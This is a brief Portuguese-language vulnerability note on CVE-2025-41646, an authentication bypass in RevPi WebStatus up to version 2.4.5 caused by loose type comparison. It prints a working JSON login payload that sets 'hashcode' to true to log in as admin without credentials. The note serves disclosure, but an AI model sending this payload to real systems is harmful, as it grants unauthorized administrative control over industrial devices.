
CVE-2025-41646 - Bypass crítico de autenticação
CVE-2025-41646 - Bypass crítico de autenticação
Uma vulnerabilidade crítica de bypass de autenticação (CVE-2025-41646) no RevPi WebStatus ≤ v2.4.5 permite que um atacante faça login como admin sem credenciais válidas devido à lógica de comparação de tipos fraca (== vs ===).
Envie uma solicitação de login com:
{
"mode": "LOGIN",
"username": "admin",
"hashcode": true
}